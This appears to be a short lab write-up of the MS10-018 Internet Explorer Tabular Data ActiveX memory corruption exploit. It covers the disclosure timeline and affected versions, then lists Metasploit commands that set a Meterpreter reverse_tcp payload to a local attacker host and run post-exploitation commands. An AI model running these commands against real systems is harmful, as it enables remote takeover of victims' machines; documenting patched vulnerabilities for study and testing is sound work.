Timeline :
Vulnerability privately disclosed to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB980182” provided the 2010-03-30
Metasploit PoC provided by jduck the 2010-04-05
PoC provided by :
Anonymous
jduck
Reference(s) :
Affected version(s) :
Internet Explorer 5
Internet Explorer 6
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB980182
Description :
This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the “DataURL” parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.
Commands :
use windows/browser/ms10_018_ie_tabular_activex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
sysinfo
getuid
ipconfig